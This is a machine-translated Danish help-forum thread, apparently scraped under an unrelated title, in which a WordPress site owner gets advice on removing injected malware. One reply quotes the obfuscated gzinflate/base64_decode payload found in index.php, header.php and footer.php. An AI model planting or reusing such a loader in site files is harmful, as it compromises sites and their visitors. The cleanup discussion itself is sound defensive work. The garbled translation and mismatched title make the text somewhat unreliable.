Penguinz0 hykleri personificeret (bomuld Tho)

Hej venner, min wordpress-side blev injiceret, og nu skal jeg løse det.

her er mit domæne,

http://webstutorial.com/

Hvad jeg skal gøre, hjælp mig venligst.

Dette er ikke en spam- eller linkbygningsteknik

Tjek din main.php filens overskrift og sidefod for ondsindet kode og fjern det, dette er den fil, der er inficeret. Opdater thumb.php fra Timthumb, og kontroller også dine index.php-filer for ondsindet kode.

Når du har fjernet den ondsindede kode fra main.php, og du har tjekket index.php, skal du søge i alle dine filer efter den ondsindede kode, når du først har renset, opdater WordPress til den nyeste version, opdater din skabelon og opdater alle plugins.

  • når jeg tjekkede min index.php fil jeg fandt denne kode # 215d25 # echo (gzinflate (base64_decode ( "TYxBDoMwDMC + UVU + Iu04AX8JJerataRLUjZ + PyQuu9qyRw2Smjk7Gk3e6GuQcceLeldwix3jqf6pSpj806w9AD60qHVjSViGwBVgpcogHF53SPVsFfK7kxw34xgLDVm9m0e4ZvMP"))); # / 215d25 #
  • Fjern det fra din indeksfil, og søg derefter efter alle dine filer base64_decode men fjern kun flere funktioner, hvis de er nøjagtigt de samme, fordi base64-kodning er normal. Denne funktion er dog ondsindet.
  • Jeg fandt den kode i header.php, footer.php og i index.php filer, jeg fjernede derfra og nu søgte i andre filer
  • Avast registrerer ikke længere malware, men krom er, du bliver nødt til at vente på, at Google gencrawler dit websted og opdaterer deres indeks med den rene version. Hvis dette var nyttigt, bedes du markere dette som svaret.
  • 1 @Nick, du vil muligvis også læse mit svar om sikring af wordpress. Ved at følge de trin, der er beskrevet der, skal du forhindre dig i at blive hacket i fremtiden.

arbejdet for dig: Charles Robertson | Ønsker du at kontakte os?